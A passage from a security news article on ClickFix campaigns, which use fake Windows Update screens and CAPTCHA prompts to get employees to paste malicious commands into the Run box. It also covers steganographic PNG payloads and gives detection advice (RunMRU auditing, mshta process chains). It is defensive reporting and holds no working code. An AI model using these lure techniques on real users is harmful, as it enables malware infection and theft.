Run dialog box, Windows Terminal, or Windows PowerShell. This leads to the downloading of scripts that launch malware.Two new tactics are used in the latest ClickFix campaign, says Huntress:
the use since early October of a fake blue Windows Update splash page in full-screen, displaying realistic “Working on updates” animations that eventually conclude by prompting the user to follow the standard ClickFix pattern: open the Run prompt (Win+R), then paste and run the malicious command.Why would an employee do this? Because the request is part of an alleged test to prove the victim is human. A screen saying “Human Verification. Follow 3 quick steps to verify you’re not a robot.” is displayed. It’s like a CAPTCHA request, which is familiar to employees these days. In this case, the three steps are: press the Windows button + R (which opens the Run box); press CTRL + V (which pastes in a command that was automatically copied to the clipboard); and then press Enter to “verify” (which actually runs the command that triggers downloading of scripts).steganography, which conceals the final malware stages within an image. Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload in memory;In an email, report co-author Ana Pham said steganography is not new to malware operations. “What stands out here is the implementation: rather than simply appending malicious data to an image file, this campaign encodes the payload directly into the RGB pixel values of PNG images, extracting shellcode by reading specific color channels and applying XOR decryption. It’s a more involved approach than basic file-appending techniques, designed to evade signature-based detection.”The Windows Update-themed tactic is particularly effective because it mimics something users expect to see: a full-screen Windows Update splash page with realistic animations, she said.”Given how convincing this lure is compared to standard ‘robot verification’ pages, it’s reasonable to expect other threat actors will adopt similar approaches,” she added. “The source code for these lures contains Russian-language comments and isn’t heavily obfuscated, meaning it could be shared or copied by other groups relatively easily.”
Attacks are now ‘rampant’: ClickFix has become rampant among Huntress’ customers, she said, and is one of the most prevalent threats seen this year. In the past six months, the company has seen a 313% increase in ClickFix-related incidents.Huntress responded to 76 separate incidents tied to this specific campaign over a one month period from late September through October, with attacks targeting organizations across multiple regions, including the United States, Europe/Middle East/Africa, and Asia-Pacific.What ties the incidents together is a specific indicator, Pham said: the initial payload, which ultimately delivers the steganographic loader, always contains a URL where the second octet is encoded in hexadecimal format.Researchers at Palo Alto Networks Unit 42 threat intelligence division have also reported seeing more ClickFix attacks. In a July report, they said attackers lure victims into copying and pasting commands to apply quick fixes to common computer issues such as performance problems, missing drivers, or pop-up errors. Fake tech support forums are one way these attack start. Threat actors have also been known, in other campaigns, to use fake DocuSign and Okta single-sign-on pages to trick users. Payloads include infostealers, remote access trojans (RATS), or tools that disable security.”This delivery method bypasses many standard detection and prevention controls” says the Palo Alto report. “There is no exploit, phishing attachment, or malicious link. Instead, potential victims unknowingly run the command themselves, through a trusted system shell. This method makes infections from ClickFix more complicated to detect than drive-by downloads or traditional malware droppers.”In yet another instance, researchers at NCC Group today issued this report on a ClickFix attack they discovered in May that involved a drive-by compromise and the use of a fake CAPTCHA popup, with the goal of installing the Lumma C2 Stealer.
What CSOs should do: But CSOs aren’t without defenses. One is disabling the Windows Run dialogue through registry modifications or Group Policy. As well, they should audit the RunMRU registry key (which keeps a copy of the most recently executed commands from the Run window) during investigations to check if users have executed suspicious commands through the Run dialog. Palo Alto Networks notes some key indicators for suspicious RunMRU contents could be obfuscated content, keywords related to the download and execution of payloads from unknown or suspicious domains, and keywords indicating calls to administrative interfaces.Pham also said leaders should deploy endpoint monitoring for suspicious process chains, particularly watching for explorer.exe spawning mshta.exe, or PowerShell with unusual command-line arguments.Palo Alto Networks also warned that some attackers aim to avoid exposing their activity in the RunMRU registry key by presenting instructions to launch a terminal for PowerShell (Windows 11) or Command Prompt (Windows 10). EDR telemetry or Windows Event Logs will show signs of this tactic.While security awareness training is important, it shouldn’t be the only line of defense, said Pham.”ClickFix succeeds because it exploits user trust and habitual behavior,” she said. “Users instinctively trust CAPTCHA checks and Windows update screens as routine parts of their day. Even well-trained users can be caught off guard by a convincing full-screen Windows Update animation. The most effective [mitigation] approach combines user education with technical controls: disabling the Run dialog, monitoring for suspicious process behavior, and maintaining robust endpoint detection. Defense in depth matters here, training reduces the likelihood someone falls for the lure, but technical controls provide a safety net when they do.”At this time Huntress doesn’t have enough evidence to determine whether this specific campaign was run by a particular threat actor or multiple groups of threat actors, Pham noted.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4096241/new-clickfix-attacks-use-fake-windows-update-screens-to-fool-employees.html
